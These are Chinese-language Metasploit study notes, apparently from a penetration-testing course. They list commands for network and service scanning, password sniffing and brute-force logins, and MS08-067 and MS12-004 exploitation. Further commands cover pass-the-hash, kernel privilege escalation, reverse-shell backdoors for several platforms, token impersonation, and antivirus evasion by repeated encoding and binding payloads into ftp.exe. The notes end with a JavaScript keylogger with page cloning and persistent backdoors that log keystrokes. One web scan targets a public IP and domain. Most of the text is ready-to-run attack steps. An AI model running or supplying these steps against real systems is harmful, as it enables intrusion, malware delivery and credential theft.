1.启动msfconsole
2.cd /usr/share/metasploit.framework/,然后./msfconsole
3.退出 quit
4.更新 ./msfupdate,若失败重装吧,,,
5.端口扫描
MSF的扫描模块
use auxiliary/scanner/portscan/syn
show options
set INTERFACE eth0
set ports 445
set RHOSTS 192.168.126.0/24
set THREADS 100
run
quit
6.SMB 获取操作系统信息
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.126.128
run
set RHOSTS 192.168.126.1-200
run
7.服务识别 ssh、ftp
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.126.128 192.168.126.131
run
use auxiliary/scanner/ftp/ftp_version
8.密码嗅探
use auxiliary/sniffer/psnuffle
run
在局域网内访问ftp服务,看是否能嗅探到。
9.snmp枚举
use auxiliary/scanner/snmp/snmp_login 登录
use auxiliary/scanner/snmp/snmp_enum 枚举
10.SMB登录检查
IP地址、账号、密码
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.1/24
run
直接就开始暴力登录了,,,,(难道不需要设置用户和密码字典么?)
11.VNC身份验证
use auxiliary/scanner/vnc/vnc_none_auth
set RHOSTS xxxxx
set THREADS xxx
12.WMAP Web扫描
进入msfconsole后
load wmap
wmap_sites
添加一个url
wmap_sites -a http://www.0day.co
查看添加的url
wmap_sites -l
wmap_targets -h
wmap_targets -t http://210.209.122.31
wmap_targets -l 查看写入成功
wmap_run -t 发现漏洞
wmap_run -e 测试漏洞
wmap_vulns -l 输出扫描出来的结果
第二季
1.远程代码执行
search 08-067
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.48.169
set payloads windows/meterpreter/reverse_tcp
然后设置载荷
set LHOST 192.16.48.130
可以用nmap扫描对方操作系统的版本
nmap -O xx.xx.xx.xx
set target 17
设置好后,进行攻击,执行exploit
得到shell
2.MIDI文件解析远程代码执行
search 12-004
exploit/windows/browser/ms12_004_midi
set SRVHOST 为本机的IP地址
set URLPATH / ;这样就不会显示随机生成的网页名称,隐藏恶意特征
这个需要别人用IE来访问我们的网站
执行成功后,先不着急弹出shell,执行sessions命令查看会话。
然后执行sessions -i 1的命令,连接session为1的会话
输入shell
3.口令安全
(1)测试MySql
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 127.0.0.1
set USERNAME root
set PASS_FILE /root/1.txt
set THREADS 50
exploit
成功后显示绿色
(2)测试ssh
use auxiliary/ssh/ssh_login
配置同MySql相同
(3)ftp_login
4.Hash值传递渗透
(1)在不知道密码情况下,通过一些方法可以获取密码的hash值,然后使用Hash传递
use exploit/windows/smb/psexec
set smbpass hash值
exploit
5.NDProxy内核提权
先建立会话;
然后搜索,执行search 14-002
exploit/windows/local/ms_ndproxy
这个漏洞只需要设置session参数即可,比如要对会话1进行攻击,set session 1即可。
执行成功后,使用getuid查看当前用户。
6.多种后门生成
(1)windows后门、Linux后门、java后门、php后门、jsp后门、asp后门等等
(2)show payloads 查看载荷
(3)生成载荷,使用msfpayload命令
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.123.31 LPORT=1234 X> /123.exe
生成的123.exe拷贝到目标机中,先不要执行,要在meta中开启监听。
(4)在meta中开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
然后设置本地的监听IP和端口,执行等反弹
同理linux下的反弹载荷生成
msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.48.130 LPORT=4321 X>linux
生成java后门
msfpayload java/meterpreter/reverse_tcp LHOST=192.168.x.x … W>123.jar
生成php后门,并对其进行编码
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=4321 R | msfencode -e php/base64 -t -o 123.php
生成安卓后门
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.48.130 LPORT=4321 R >1.apk
7.内网渗透
meterpreter> run get_local_subnets
meterpreter> run autoroute -s 192.168.48.0/24
meterpreter> run autoroute -p
net view 显示域
use incognito;
list_tokens -u(显示令牌吗?)
impersonate_token ADMIN-XXXXX\user1
使用sniffer模块进行嗅探,获取域管理员的密码
use auxiliary/sniffer/psnuffle
xp靶机运行ftp服务,然后登陆看能够获取信息
8.反反病毒(免杀)
编码方式做免杀;
生成一个编码的windows反弹shell
msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -e x86/shikata_ga_nai -t exe > 123.exe
建议多种编码,提高效果;编码可以组合,也可以单个重复使用。
msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -e x86/shikata_ga_nai -c 10 -t raw | msfencode -e x86/countdown -c 5 -t exe -o /1231.exe
(使用两种编码,各重复运行了10次和5次)
绑定一个正常文件,与一个ftp.exe捆绑
msfpayload windows/shell/reverse_tcp LHOST=192.168.48.130 LPORT=1111 R | msfencode -t exe -x /root/ftp.exe -o 123123.exe -e x86/shikata_ga_nai -k -c 10
9.玩转XSS
search keylogger
use auxiliary/server/capture/http_javascript_keylogger
set DEMO true
set URIPATH /
set srvport 80
生成一个url,也可以克隆一个页面,比如qq、谷歌
10.后门维持
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST xxx
set LPORT xxx
run ------ 等待靶机回连,建立会话
会话建立后,执行如下命令,上传其他模块,并建立一个服务
run metsvc -A (相当于一个主动马)
再开启一个msfconsole,执行如下命令
use exploit/multi/handler
set payload windows/metsvc_bind_tcp
set LPORT 31377(监听端口,listen port)
set RHOST 192.168.48.130(对方的IP,target ip)
exploit
连接到对方,建立一个会话shell
然后执行keyscan_start操作 ,keyscan_dump